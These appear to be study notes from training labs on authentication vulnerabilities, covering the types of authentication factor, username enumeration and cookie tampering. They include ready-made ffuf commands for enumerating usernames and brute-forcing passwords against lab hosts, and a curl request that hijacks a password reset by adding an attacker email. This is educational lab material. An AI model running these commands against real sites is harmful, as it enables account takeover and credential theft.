Skip to content

01 Authentication

Introduction

  • Authentication is the process of verifying the identity of the user or client.
  • There are three types of Authentication
  • Something you know (Passwords, Security questions, etc). Also called knowledge factors.
  • Something you have (Mobile phone, security token, etc). Also called possession factors.
  • Something you are (Biometrics). Also called inherence factors.

Authentication vs Authorization

  • Authentication is the process of verifying that a user is who they claim to be.
  • Authorization involves verifying whether a user is allowed to do something.

Why Authentication Vulnerabilities Arise

  • Most authentication vulnerabilities arise due to one of the following two ways
  • Authentication mechanisms are weak and doesn't provide protection against brute forcing.
  • Logic flaws or poor coding due to which authentication can be bypassed entirely.

Impact of Authentication Vulnerabilities

  • Impact is often high or critical due to the fact that the account can be took over by the attacker.
  • If the account is high privileged then the whole application can be compromised.

Vulnerabilities in Password-Based login

Bruteforce Attacks

  • Usernames can be bruteforced on the following conditions.
  • If they conform to a specific pattern such as firstname.lastname@companyname.com.
  • If the usernames are predictable such as admin or administrator.
  • Passwords can similarly be brute-forced, with the difficulty varying based on the strength of the password.
  • Users often take a password that they can remember and try to crowbar it into fitting the password policy.
  • For example, if mypassword is not allowed, users may try something like Mypassword1! or Myp4$$w0rd instead.

Username Enumeration

  • Username enumeration is when an attacker is able to observe changes in the website's behavior in order to identify whether a given username is valid.
  • Username enumeration typically occurs either on the login page.
  • For example, when you enter a valid username but an incorrect password, or on registration forms when you enter a username that is already taken.
  • Look for changes in the following areas to identify the usernames.
  • Status codes
  • Response text
  • Error messages
  • Response time
  • Enumerate usernames with ffuf using the below command. 
    1
    ffuf -X POST -w usernames.txt:FUZZ -d "username=FUZZ&password=test" -u https://0a2300d70345a82482604224009f00ea.web-security-academy.net/login -H "Host:0a2300d70345a82482604224009f00ea.web-security-academy.net" -fr "Invalid username"

Enumerate Passwords

  • Enumerate passwords with ffuf using the below command. 

    1
    ffuf -X POST -w passwords.txt:FUZZ -d "username=af&password=FUZZ" -u https://0a2300d70345a82482604224009f00ea.web-security-academy.net/login -H "Host:0a2300d70345a82482604224009f00ea.web-security-academy.net" -fc 200

  • Support website: http://10.10.129.12/customers/signup/ 

    1
    ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.129.12/customers/signup -mr "username already exists"

Bruteforce Password

  • Use the identified usernames and attempt to find the passwords.
  • If you created your valid_usernames file by piping the output from ffuf directly you may have difficulty with this task. Clean your data, or copy just the names into a new file. 
    1
    ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.129.12/customers/login -fc 200
  • Bruteforce individual usernames. 
    1
    ffuf -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W1 -X POST -d "username=<USERNAME>&password=W1" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.129.12/customers/login -fc 200

Logic Flaws

  • Password reset request looks like below. 
    1
    curl 'http://10.10.129.12/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'
  • Create an account with email id attacker@hacker.com and update the curl request like below. 
    1
    curl 'http://10.10.129.12/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'
  • Cookies are set by the web server during your online session can have multiple outcomes, such as unauthenticated access, access to another user's account, or elevated privileges.
  • Some of the examples of cookies set after successful login are
  • Set-Cookie: logged_in=true; Max-Age=3600; Path=/
  • Set-Cookie: admin=false; Max-Age=3600; Path=/
  • Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/
  • eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ== - base64 decoded has the value of {"id":1,"admin": false}